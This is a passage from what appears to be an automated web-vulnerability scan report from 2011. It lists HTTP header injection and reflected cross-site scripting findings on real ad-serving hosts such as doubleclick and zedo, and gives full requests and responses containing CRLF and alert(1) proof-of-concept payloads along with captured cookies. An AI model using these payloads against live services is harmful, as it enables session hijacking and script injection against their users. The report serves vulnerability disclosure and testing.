&A2S=1/respcamphist;src=1516833;ec=nh;rch=2;lastimp=0;lastimptime=0;lis=0;lip=0;lic=0;lir=0;lirv=0;likv=0;lipn=;lastclk=0;lastclktime=0;lcs=0;lcp=0;lcc=0;lcr=0;lcrv=0;lckv=0;lcpn=;ord=1303675007:
Date: Sun, 24 Apr 2011 19:56:47 GMT
Server: GFE/2.0
Content-Type: text/html


5.3. http://adfarm1.adition.com/track [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adfarm1.adition.com
Path:   /track

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 209f7%0d%0a9e16d477dc8 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /track?tid=328&sid=1132&rdm=15241710.050031543&209f7%0d%0a9e16d477dc8=1 HTTP/1.1
Host: adfarm1.adition.com
Proxy-Connection: keep-alive
Referer: http://de.swisscom.ch/privatkunden
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Server: ADITIONSERVER 1.0
Date: Sun, 24 Apr 2011 20:50:32 +0200
Connection: close
Content-Type: text/plain
Location: http://adfarm1.adition.com:80/track?co=1&209f7
9e16d477dc8
=1&rdm=15241710.050031543&sid=1132&tid=328&clickurl=
P3P: policyref="http://imagesrv.adition.com/w3c/p3p.xml",CP="NOI DSP COR NID ADMo OUR NOR COM"
Set-Cookie: co=1; path=/; expires=We, 01-Jan-2025 00:00:00 GMT; domain=.adfarm1.adition.com


5.4. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload b4be9%0d%0a1c4d0fc4311 was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=3&q=&$=b4be9%0d%0a1c4d0fc4311&s=376&z=0.8531599652840236 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: ZCBC=1; FFgeo=2241452; FFcat=809,1050,9:809,1050,21; FFad=0:0; ZEDOIDA=xlO0TcGt89Z-t7Q0A2jzc9p9~042411; ZEDOIDX=21; FFCap=1574B809,210841|0,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=809:b4be9
1c4d0fc4311
;expires=Mon, 25 Apr 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=228
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:46:33 GMT
Connection: close
Content-Length: 1385

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat=',b4be9

...[SNIP]...

5.5. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload b5437%0d%0a3c4d98db33f was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-405/d3/jsc/fmr.js?c=1050&a=0&f=&n=809&r=21&d=21&q=&$=b5437%0d%0a3c4d98db33f&s=376&z=0.7153747249743863 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=809:b5437
3c4d98db33f
;expires=Mon, 25 Apr 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZEDOIDA=7lO0TcGt89bIsvwFVlnvVOHt~042411;expires=Wed, 21 Apr 2021 16:46:38 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFgeo=2241452;expires=Mon, 23 Apr 2012 16:46:38 GMT;domain=.zedo.com;path=/;
ETag: "426044d-8181-4a12b03c8ce80"
Vary: Accept-Encoding
X-Varnish: 1634248835 1634247186
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=223
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:46:38 GMT
Connection: close
Content-Length: 2772

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat=',b5437

...[SNIP]...

5.6. http://matcher.bidder7.mookie1.com/google [cver parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://matcher.bidder7.mookie1.com
Path:   /google

Issue detail

The value of the cver request parameter is copied into the X-ZAMA-MATCHER-ERROR response header. The payload d4df8%0d%0aa06dec800c0 was submitted in the cver parameter. This caused a response containing an injected HTTP header.

Request

GET /google?id=CAESEEkl9lk5w80cMoOGmB9XYWY&cver=d4df8%0d%0aa06dec800c0 HTTP/1.1
Host: matcher.bidder7.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/RTB/11377797616@x24?USNetwork/PizzaHut_2H_201008_ZT_18-49_All
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; other_20110126=set; id=914804995789526; RMFM=011QD4ETU10CWN; NXCLICK2=011QD4ETNX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011QD4ETU107OI|U107OK

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:24:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-ZAMA-MATCHER-ERROR: google has sent non numeric (or zero) cver 'd4df8
a06dec800c0
'
Cache-Control: no-cache,no-store,private
Pragma: no-cache
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

6. Cross-site scripting (reflected)  previous  next
There are 474 instances of this issue:


6.1. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.15 [labels parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2886.151350.QUANTCAST.COM/B5403001.15

Issue detail

The value of the labels request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f993c"-alert(1)-"20f0488e922 was submitted in the labels parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N2886.151350.QUANTCAST.COM/B5403001.15;sz=160x600;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb,_click.rand.43369f993c"-alert(1)-"20f0488e922&rtbip=63.251.90.149&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKKgXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloGnUEsIU_gAHPk_nrBpABhKsHoAEBqAGmswewAQI&redirecturl2=;ord=43369? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303665997&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647997762&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303647997767&frm=1&adk=2614322350&ga_vid=1901204360.1303647998&ga_sid=1303647998&ga_hid=1446633403&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 12:37:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7318

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
3/f/192/%2a/k%3B240320597%3B0-0%3B0%3B62289813%3B2321-160/600%3B41844251/41862038/1%3B%3B%7Esscs%3D%3fhttp://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb,_click.rand.43369f993c"-alert(1)-"20f0488e922&rtbip=63.251.90.149&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKKgXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY
...[SNIP]...

6.2. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.15 [redirecturl2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2886.151350.QUANTCAST.COM/B5403001.15

Issue detail

The value of the redirecturl2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 499fc"-alert(1)-"cfc85e2b456 was submitted in the redirecturl2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N2886.151350.QUANTCAST.COM/B5403001.15;sz=160x600;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb,_click.rand.43369&rtbip=63.251.90.149&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKKgXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloGnUEsIU_gAHPk_nrBpABhKsHoAEBqAGmswewAQI&redirecturl2=499fc"-alert(1)-"cfc85e2b456 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303665997&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647997762&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303647997767&frm=1&adk=2614322350&ga_vid=1901204360.1303647998&ga_sid=1303647998&ga_hid=1446633403&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7222
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 24 Apr 2011 12:39:39 GMT
Expires: Sun, 24 Apr 2011 12:39:39 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloGnUEsIU_gAHPk_nrBpABhKsHoAEBqAGmswewAQI&redirecturl2=499fc"-alert(1)-"cfc85e2b456http://www.metropcs.com/android?utm_source=DART&utm_medium=Display%2BMedia&utm_campaign=MPCS%2BGM%2BQ2%2BInterim%2B(5403001)");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque
...[SNIP]...

6.3. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.15 [rtbdata2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2886.151350.QUANTCAST.COM/B5403001.15

Issue detail

The value of the rtbdata2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f76fe"-alert(1)-"0f47eb8b094 was submitted in the rtbdata2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N2886.151350.QUANTCAST.COM/B5403001.15;sz=160x600;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb,_click.rand.43369&rtbip=63.251.90.149&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKKgXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloGnUEsIU_gAHPk_nrBpABhKsHoAEBqAGmswewAQIf76fe"-alert(1)-"0f47eb8b094&redirecturl2=;ord=43369? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303665997&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647997762&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303647997767&frm=1&adk=2614322350&ga_vid=1901204360.1303647998&ga_sid=1303647998&ga_hid=1446633403&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 12:39:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7318

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
gXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloGnUEsIU_gAHPk_nrBpABhKsHoAEBqAGmswewAQIf76fe"-alert(1)-"0f47eb8b094&redirecturl2=http%3a%2f%2fwww.metropcs.com/android%3Futm_source%3DDART%26utm_medium%3DDisplay%252BMedia%26utm_campaign%3DMPCS%252BGM%252BQ2%252BInterim%252B%285403001%29");
var fscUrl = url;
var fsc
...[SNIP]...

6.4. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.15 [rtbip parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2886.151350.QUANTCAST.COM/B5403001.15

Issue detail

The value of the rtbip request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23c5b"-alert(1)-"62d3592bb19 was submitted in the rtbip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N2886.151350.QUANTCAST.COM/B5403001.15;sz=160x600;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb,_click.rand.43369&rtbip=63.251.90.14923c5b"-alert(1)-"62d3592bb19&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKKgXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloGnUEsIU_gAHPk_nrBpABhKsHoAEBqAGmswewAQI&redirecturl2=;ord=43369? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303665997&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647997762&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303647997767&frm=1&adk=2614322350&ga_vid=1901204360.1303647998&ga_sid=1303647998&ga_hid=1446633403&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 12:38:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7318

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
20597%3B0-0%3B0%3B62289813%3B2321-160/600%3B41844251/41862038/1%3B%3B%7Esscs%3D%3fhttp://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb,_click.rand.43369&rtbip=63.251.90.14923c5b"-alert(1)-"62d3592bb19&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKKgXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFl
...[SNIP]...

6.5. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.15 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2886.151350.QUANTCAST.COM/B5403001.15

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb328"-alert(1)-"9fe4dc0640 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N2886.151350.QUANTCAST.COM/B5403001.15;sz=160x600;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1lseb328"-alert(1)-"9fe4dc0640&labels=_qc.clk,_click.adserver.rtb,_click.rand.43369&rtbip=63.251.90.149&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKKgXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloGnUEsIU_gAHPk_nrBpABhKsHoAEBqAGmswewAQI&redirecturl2=;ord=43369? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303665997&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647997762&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303647997767&frm=1&adk=2614322350&ga_vid=1901204360.1303647998&ga_sid=1303647998&ga_hid=1446633403&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 12:37:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7314

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af3/f/191/%2a/k%3B240320597%3B0-0%3B0%3B62289813%3B2321-160/600%3B41844251/41862038/1%3B%3B%7Esscs%3D%3fhttp://exch.quantserve.com/r?a=p-03tSqaTFVs1lseb328"-alert(1)-"9fe4dc0640&labels=_qc.clk,_click.adserver.rtb,_click.rand.43369&rtbip=63.251.90.149&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKKgXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEP
...[SNIP]...

6.6. http://ad.doubleclick.net/adi/N3671.Google/B5102071.8 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.Google/B5102071.8

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db526"-alert(1)-"f38d76248c2 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3671.Google/B5102071.8;sz=160x600;pc=gdnHwu80gEAAAA;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BfYqAHEy0TbPrEcuBlgeC9vCrAseG85QCx7X3yR3AjbcB8LT4ARABGAEg2aK3DzgAUPuY1pwHYMnug4jwo-wSoAGhvOPWA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YrgCGMgC94qgG6gDAdEDHROmdxAz1pjoA7wB6AOUAvUDAAAAxA&num=1&sig=AGiWqty58OsInd0vwE_hq6qLB0DF4PWwgw&client=ca-pub-6888065668292638&adurl=db526"-alert(1)-"f38d76248c2 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679599&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661599233&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303661599239&frm=1&adk=2614322350&ga_vid=1010643910.1303661599&ga_sid=1303661599&ga_hid=1918276477&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
